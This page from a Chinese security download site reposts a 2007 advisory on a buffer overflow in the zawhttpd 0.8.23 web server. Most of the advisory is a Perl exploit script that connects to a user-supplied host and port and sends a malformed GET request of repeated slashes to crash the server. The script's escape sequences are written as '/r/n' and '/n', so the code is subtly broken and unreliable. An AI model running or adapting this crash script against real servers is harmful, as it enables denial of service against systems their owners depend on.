|
网站首页
|
模板
|
资料
|
源码
|
工具
|
开发
|
设计
|
安全
|
项目
|
网络
|
图片
|
系统
|
数据库
|
博客
|
会员中心
|
小说
|
网络学院
学习资料
源码模版
您现在的位置:
精品下载
>>
安全
>>
网络安全
>> 安全中心正文
用户登录
新用户注册
zawhttpd Buffer Overflow
【字体:
小
大
】
zawhttpd Buffer Overflow
作者:佚名 安全中心来源:不详 点击数: 更新时间:2007-10-10
Summary
"zawhttpd is a small http server."
Improper handling of HTTP headers allows attackers to cause a buffer overflow and execute arbitrary code or crash zawhttpd.
Credit:
The information has been provided by Kamil 'K3' Sienicki.
Details
Vulnerable Systems:
* zawhttpd version 0.8.23
Exploit:
#!/usr/bin/perl
# zawhttpd Buffer Overflow Exploit
# by Kamil 'K3' Sienicki
use IO::Socket;
use strict;
my($socket) = "";
if($socket = IO::Socket::INET->new(
PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => "TCP"))
{
print "Attempting to kill zawhttpd at $ARGV[0]:$ARGV[1] ...";
print $socket "GET //////////////////// HTTP/1.0/r/n/r/n";
close($socket);
}
else
{
print "perl zawhttpd.pl localhost 80 /n";
print "Cannot connect to $ARGV[0]:$ARGV[1]/n";
}
#EoF
安全中心录入:chqnet 责任编辑:chqnet
上一个安全中心:
OCE Printer Webserver DoS Exploit
下一个安全中心:
TinyFTPD USER Buffer Overflow DoS
【
发表评论
】【
加入收藏
】【
告诉好友
】【
打印此文
】【
关闭窗口
】
最新热点
最新推荐
相关安全中心
Opera Web浏览器JPEG图像处理…
Ipswitch WhatsUp Professio…
Opera Web浏览器样式表属性缓…
BEA WebLogic Server远程文件…
Symantec Ghost SQLAnywhere…
phpBazar File Inclusion
phpBazar File Inclusion (E…
AWStats: 跨平台的日志分析工…
MSDTC Arbitrary Opposite M…
Implementing EFS in a Wind…
网友评论:
(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
|
设为首页
|
加入收藏
|
联系站长
|
友情链接
|
版权申明
|
在线技术支持:QQ:9296258 MYFTP资料来自网络,免费提供给网民学习。如本站侵犯了您的版权,请与我们联系。
MYFTP 版权所有 Copyright© 2004-2008 站长:
chengq